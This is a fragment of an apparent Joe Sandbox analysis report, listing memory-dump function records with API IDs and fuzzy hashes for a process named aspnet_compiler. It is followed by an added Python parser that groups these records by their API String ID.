                                                • Source File: 00000007.00000002.383393735.0000000000900000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000007.00000002.383393735.00000000008F0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009E0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009F0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009F4000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009F7000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.0000000000A00000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.0000000000A60000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_8f0000_aspnet_compiler.jbxd
                                                Similarity
                                                • API ID: __fassign
                                                • String ID:
                                                • API String ID: 3965848254-0
                                                • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                • Instruction ID: c5c6ff21687514e1d96d00d2caf9acf8297ec8c698c99a0c8ac3dff7d0cc2a40
                                                • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                • Instruction Fuzzy Hash: A2919172D0021AEFDF24CF59C855AAFB7B8FF55309F24847AD445A72A2E7304A41CB91
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.383393735.0000000000900000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000007.00000002.383393735.00000000008F0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009E0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009F0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009F4000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009F7000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.0000000000A00000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.0000000000A60000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_8f0000_aspnet_compiler.jbxd
                                                Similarity
                                                • API ID: __aulldvrm
                                                • String ID: $$0
                                                • API String ID: 1302938615-389342756
                                                • Opcode ID: ea51973c8aa4d2604151950c5ffe2c4fd6916210c209e7f5d6d40c90bd95cbff
                                                • Instruction ID: 99a808b50d8f0f32f8975b99d274b60f20cc6953204e6c598a98653e63259d43
                                                • Opcode Fuzzy Hash: ea51973c8aa4d2604151950c5ffe2c4fd6916210c209e7f5d6d40c90bd95cbff
                                                • Instruction Fuzzy Hash: 8F91AF30D04B9AAFDF24CFA9C444BEDBBB4AF45310F16465ED4A2A72D1C3746A81CB52
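The per-function records above (memory dump source, IDA snapshot, API/String IDs, opcode and instruction fuzzy hashes) follow one fixed layout, and a report of this size carries thousands of them, so they are better parsed than read by eye. The Python parser below is an added example and is not part of the Joe Sandbox report or product: the record layout and field names are inferred from the listing on this page, SAMPLE is an abridged copy of three of the records above (constructed for the example, with the "Download File" link label that extraction fused onto the Associated lines left in so the parser shows how to strip it), and the rule that an "Instruction Fuzzy Hash" line closes a record, as well as the grouping function, are the example's own assumptions.

```python
import re
from dataclasses import dataclass, field

# Section headers as they appear in the report listing (assumed from this page).
SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source",
                   "Joe Sandbox IDA Plugin", "Similarity"}
API_RE = re.compile(r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
                    r"(?P<name>.+?) ref: (?P<ref>[0-9A-Fa-f]+)$")
SOURCE_RE = re.compile(r"^(?P<file>\S+), Offset: (?P<off>[0-9A-Fa-f]+), "
                       r"based on PE: (?P<pe>\w+)$")
LINK_SUFFIX = "Download File"   # link label fused onto Associated lines by extraction
ID_KEYS = ("API ID", "String ID", "API String ID", "Opcode ID",
           "Instruction ID", "Opcode Fuzzy Hash", "Instruction Fuzzy Hash")


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)     # (name, ref addr, subcall fn or None)
    strings: list = field(default_factory=list)  # (text, xref addr)
    source_file: str = ""
    base_offset: str = ""
    associated: list = field(default_factory=list)
    snapshot: str = ""
    ids: dict = field(default_factory=dict)      # API ID, String ID, Opcode ID, ...


def parse_records(text):
    """Walk the listing line by line; 'Instruction Fuzzy Hash' closes a record (assumption)."""
    records, cur, section = [], FunctionRecord(), None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if not line:
            continue
        if line in SECTION_HEADERS:
            section = line
            continue
        if section == "APIs" and (m := API_RE.match(line)):
            cur.apis.append((m["name"], m["ref"], m["sub"]))
            continue
        if section == "Strings" and ", xrefs: " in line:
            s, xref = line.rsplit(", xrefs: ", 1)
            cur.strings.append((s, xref))
            continue
        key, _, value = line.partition(":")   # first ':' only; String IDs contain colons
        key, value = key.strip(), value.strip()
        if key == "Source File" and (m := SOURCE_RE.match(value)):
            cur.source_file, cur.base_offset = m["file"], m["off"]
        elif key == "Associated":
            cur.associated.append(value.removesuffix(LINK_SUFFIX))
        elif key == "Snapshot File":
            cur.snapshot = value
        elif key in ID_KEYS:
            cur.ids[key] = value    # String ID kept raw: '$' separates entries but also occurs in them
            if key == "Instruction Fuzzy Hash":
                records.append(cur)
                cur = FunctionRecord()
    return records


def group_by_api_string_id(records):
    """Map each API String ID to the distinct Opcode IDs that carry it. One profile
    with several opcode hashes usually means duplicated CRT code, not unique logic."""
    groups = {}
    for r in records:
        groups.setdefault(r.ids.get("API String ID", ""), set()).add(r.ids.get("Opcode ID", ""))
    return groups


# Constructed sample: three records from this report, abridged.
SAMPLE = """\
APIs
• ___swprintf_l.LIBCMT ref: 0097EA22
  • Part of subcall function 009513CB: ___swprintf_l.LIBCMT ref: 0095146B
Strings
Memory Dump Source
• Source File: 00000007.00000002.383393735.0000000000900000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: true
• Associated: 00000007.00000002.383393735.00000000008F0000.00000040.00001000.00020000.00000000.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_8f0000_aspnet_compiler.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: %%%u$]:%u
• API String ID: 48624451-3050659472
• Opcode ID: e49b4aa9e17330fc0bba32bbe3b8ec0e9566f3149d02a51b74ae9deae335e553
• Instruction Fuzzy Hash: 0F21C172A00219ABCF21DF59CC41BEEB3BCAB94705F844451FC46D3140EB74AA998BE1
APIs
Strings
Similarity
• API ID: ___swprintf_l
• String ID: %%%u$]:%u
• API String ID: 48624451-3050659472
• Opcode ID: fbe8fa56723f82032111c96f1f5e723faa032c57aaff9d1ba3bbba6aab120828
• Instruction Fuzzy Hash: 9021A172A0021AABCB10EE698D45AEF77AC9B94764F048526FC05A3141EB74DE54C7E1
APIs
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009722F4
Strings
• RTL: Re-Waiting, xrefs: 00972328
• RTL: Resource at %p, xrefs: 0097230B
Similarity
• API String ID: 885266447-871070163
• Opcode ID: cba879de21a730e7216a3635e829d9ad6142dfab33ae0ba0d0ac33fbc131fe9d
• Instruction Fuzzy Hash: 5B510872700705ABDB15DB29CC81FA6739CEF98764F118229FD18DB281E661ED418B90
"""

if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for api_string_id, opcodes in group_by_api_string_id(recs).items():
        print(api_string_id, len(opcodes), "distinct opcode IDs")
```

Feed it the report's function listing saved as text; the `ids` dict per record then gives the fuzzy hashes for a similarity index, and `group_by_api_string_id` shows which API/string profiles recur under different opcode hashes, as the two `___swprintf_l` records above do.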